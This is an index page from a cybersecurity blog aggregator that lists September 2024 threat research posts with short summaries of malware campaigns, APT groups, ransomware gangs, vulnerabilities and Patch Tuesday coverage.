BLOG 2024 AI blog APT blog Attack blog BigBrother blog BotNet blog Cyber blog Cryptocurrency blog Exploit blog Hacking blog ICS blog Incident blog IoT blog Malware blog OS Blog Phishing blog Ransom blog Safety blog Security blog Social blog Spam blog Vulnerebility blog 2024 2023H January(21) February(46) H January(21) February(46) March(44) April(33) May(35) June(67) July(84) August(73) September(57) October(0) November(0) December(0) 2025 January() February() March()
DATE |
NAME |
Info |
CATEG. |
WEB |
28.9.24 |
AI-driven insights for managing emerging threats and minimizing organizational risk |
|||
28.9.24 |
Discover how to use the Cybersecurity Compass to foster effective conversations about cybersecurity strategy between non-technical and technical audiences, focusing on the phases of before, during, and after a breach. |
|||
28.9.24 |
2024 SonicWall Threat Brief: Healthcare’s Escalating Cybersecurity Challenge |
SonicWall’s 2024 Healthcare Threat Brief reveals at least 14 million U.S. patients affected by malware breaches, as outdated systems leave healthcare providers vulnerable to evolving ransomware threats - underscoring the need for MSPs/MSSPs. |
||
28.9.24 |
Secure Access Unlocked: Exploring WNM 4.5 and Service Provider Monthly Program |
Learn about exciting updates in WNM 4.5 plus new additions to our service provider program! |
||
28.9.24 |
Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors |
Unit 42 researchers have been tracking the activity of an ongoing poisoned Python packages campaign delivering Linux and macOS backdoors via infected Python software packages. We’ve named these infected software packages PondRAT. We’ve also found Linux variants of POOLRAT, a known macOS remote administration tool (RAT) previously attributed to Gleaming Pisces (aka Citrine Sleet, distributor of AppleJeus). Based on our research into both RAT families, we assess that the new PondRAT is a lighter version of POOLRAT. |
||
28.9.24 |
We recently discovered a novel version of the RomCom malware family called SnipBot and, for the first time, show post-infection activity from the attacker on a victim system. This new strain makes use of new tricks and unique code obfuscation methods in addition to those seen in previous versions of RomCom 3.0 and PEAPOD (RomCom 4.0). |
|||
28.9.24 |
Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz |
We have been monitoring a widely popular phishing-as-a-service (PhaaS) platform named Sniper Dz that primarily targets popular social media platforms and online services. A large number of phishers could be using this platform to launch phishing attacks, since the group behind this kit has thousands of subscribers on its Telegram channel. Our research revealed over 140,000 phishing websites associated with the Sniper Dz PhaaS platform over the past year. |
||
28.9.24 |
Unit 42 researchers discovered two malware samples used by the Sparkling Pisces (aka Kimsuky) threat group. This includes an undocumented keylogger, called KLogEXE by its authors, and an undocumented variant of a backdoor dubbed FPSpy. These samples enhance Sparkling Pisces' already extensive arsenal and demonstrate the group’s continuous evolution and increasing capabilities. |
|||
28.9.24 |
Check Point Research (CPR) uncovered a malicious app on Google Play designed to steal cryptocurrency marking the first time a drainer has targeted mobile device users exclusively. The app used a set of evasion techniques to avoid detection and remained available for nearly five months before being removed. |
|||
28.9.24 |
10 Years of DLL Hijacking, and What We Can Do to Prevent 10 More |
DLL Hijacking — a technique for forcing legitimate applications to run malicious code — has been in use for about a decade at least. In this write-up we give a short introduction to the technique of DLL Hijacking, followed by a digest of several dozen documented uses of that technique over the past decade as documented by MITRE. |
||
28.9.24 |
Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam |
Many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email. |
||
28.9.24 |
Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023 |
ESET Research has conducted a comprehensive technical analysis of Gamaredon’s toolset used to conduct its cyberespionage activities focused in Ukraine |
||
28.9.24 |
||||
28.9.24 |
Time to engage: How parents can help keep their children safe on Snapchat |
|||
21.9.24 |
Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware |
Authored by Neil Tyagi In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are... |
||
21.9.24 |
How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections |
Trend Micro tracked this group as Water Bakunawa, behind the RansomHub ransomware, employs various anti-EDR techniques to play a high-stakes game of hide and seek with security solutions. |
||
21.9.24 |
This is the third blog in an ongoing series on Rogue AI. Keep following for more technical guidance, case studies, and insights |
|||
21.9.24 |
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC |
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China. |
||
21.9.24 |
Vulnerabilities in Cellular Packet Cores Part IV: Authentication |
Our research reveals two significant vulnerabilities in Microsoft Azure Private 5G Core (AP5GC), both of which have now been resolved and are discussed in this blog post. |
||
21.9.24 |
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-20017, assessed its impact and developed mitigation measures for the vulnerability. CVE-2024-20017 is a critical zero-click vulnerability with a CVSS 3.0 score |
|||
21.9.24 |
Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool |
This article discusses the discovery of a new post-exploitation red team tool called Splinter that we found on customer systems using Advanced WildFire’s memory scanning tools. Penetration testing toolkits and adversary simulation frameworks are often useful for identifying potential security issues in a company's network. |
||
21.9.24 |
FBI, CISA warning over false claims of hacked voter data – Week in security with Tony Anscombe |
With just weeks to go before the US presidential election, the FBI and the CISA are warning about attempts to sow distrust in the electoral process |
||
21.9.24 |
Influencing the influencers | Unlocked 403 cybersecurity podcast (ep. 6) |
|||
21.9.24 |
||||
21.9.24 |
||||
21.9.24 |
||||
21.9.24 |
In this blog, we will provide an overview of the Iranian threat landscape and discuss the tools, tactics and techniques used by these groups. |
|||
14.9.24 |
Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities |
In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software’s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671. |
||
14.9.24 |
Earth Preta Evolves its Attacks with New Malware and Strategies |
In this blog entry, we discuss our analysis of Earth Preta’s enhancements in their attacks by introducing new tools, malware variants and strategies to their worm-based attacks and their time-sensitive spear-phishing campaign. |
||
14.9.24 |
CUCKOO SPEAR Part 1: Analyzing NOOPDOOR from an IR Perspective |
In this report, Cybereason confirms the ties between Cuckoo Spear and APT10 Intrusion Set by tying multiple incidents together and disclosing new information about this group’s new arsenal and techniques |
||
14.9.24 |
Unit 42 researchers recently found that Stately Taurus abused the popular Visual Studio Code software in espionage operations targeting government entities in Southeast Asia. Stately Taurus is a Chinese advanced persistent threat (APT) group that carries out cyberespionage attacks. |
|||
14.9.24 |
Key Group Russian Ransomware Gang Uses Extensive Multi-purpose Telegram Channel |
The SonicWall Capture Labs threat research team has been recently tracking ransomware known as Key Group. Key Group is a Russian-based malware threat group that was formed in early 2023. |
||
14.9.24 |
Hold – Verify – Execute: Rise of Malicious POCs Targeting Security Researchers |
While investigating CVE-2024-5932, a code injection vulnerability in the GiveWP WordPress plugin, our team encountered a malicious Proof of Concept (POC) targeting cybersecurity professionals. This has become a growing threat to cybersecurity professionals from threat actors to achieve their motives, such as crypto mining, data exfiltration and backdoor installation |
||
14.9.24 |
Microsoft’s September 2024 Patch Tuesday has 79 vulnerabilities, of which 30 are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2024 and has produced coverage for 9 of the reported vulnerabilities. |
|||
14.9.24 |
Targeted Iranian Attacks Against Iraqi Government Infrastructure |
Check Point Research discovered a new set of malware called Veaty and Spearal that was used in attacks against different Iraqi entities including government networks. |
||
14.9.24 |
DragonRank, a Chinese-speaking SEO manipulator service provider |
Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation |
||
14.9.24 |
Talos' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers. |
|||
14.9.24 |
Vulnerability in Tencent WeChat custom browser could lead to remote code execution |
While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor. |
||
14.9.24 |
Watch our new documentary, "The Light We Keep: A Project PowerUp Story" |
The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country. |
||
14.9.24 |
A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. |
|||
14.9.24 |
CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges. |
|||
14.9.24 |
September’s monthly round of patches from Microsoft included 79 vulnerabilities, seven of which are considered critical. |
|||
14.9.24 |
The best and worst ways to get users to improve their account security |
In my opinion, mandatory enrollment is best enrollment. |
||
14.9.24 |
Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads |
The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. |
||
14.9.24 |
CosmicBeetle joins the ranks of RansomHub affiliates – Week in security with Tony Anscombe |
ESET research also finds that CosmicBeetle attempts to exploit the notoriety of the LockBit ransomware gang to advance its own ends |
||
14.9.24 |
||||
14.9.24 |
CosmicBeetle, after improving its own ransomware, tries its luck as a RansomHub affiliate |
|||
11.9.24 |
Fake recruiter coding tests target devs with malicious Python packages |
RL found the VMConnect campaign continuing with malicious actors posing as recruiters, using packages and the names of financial firms to lure developers. |
||
7.9.24 |
Our research reveals that an unidentified threat cluster we named TIDRONE have shown significant interest in military-related industry chains, particularly in the manufacturers of drones. |
|||
7.9.24 |
Banking Trojans: Mekotio Looks to Expand Targets, BBTok Abuses Utility Command |
Notorious Mekotio and BBTok are having a resurgence targeting Latin American users. Mekotio’s latest variant suggests the gang behind it is broadening their target, while BBTok is seen abusing MSBuild.exe to evade detection. |
||
7.9.24 |
Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion |
While monitoring Earth Lusca, we discovered the threat group’s use of KTLVdoor, a highly obfuscated multiplatform backdoor, as part of a large-scale attack campaign. |
||
7.9.24 |
CVE-2024-23119: Critical SQL Injection Vulnerability in Centreon |
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability. CVE-2024-23119 is a high-severity SQL Injection vulnerability in Centreon, impacting Centreon |
||
7.9.24 |
Bitcoin ATM scams skyrocket – Week in security with Tony Anscombe |
The schemes disproportionately victimize senior citizens, as those aged 60 or over were more than three times as likely as younger adults to fall prey to the scams |
||
7.9.24 |
||||
7.9.24 |
The key considerations for cyber insurance: A pragmatic approach |
|||
7.9.24 |
Sometimes there’s more than just an enticing product offer hiding behind an ad |
|||
1.9.24 |
North Korean threat actor Citrine Sleet exploiting Chromium zero-day |
Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as CVE-2024-7971, to gain remote code execution (RCE). |
||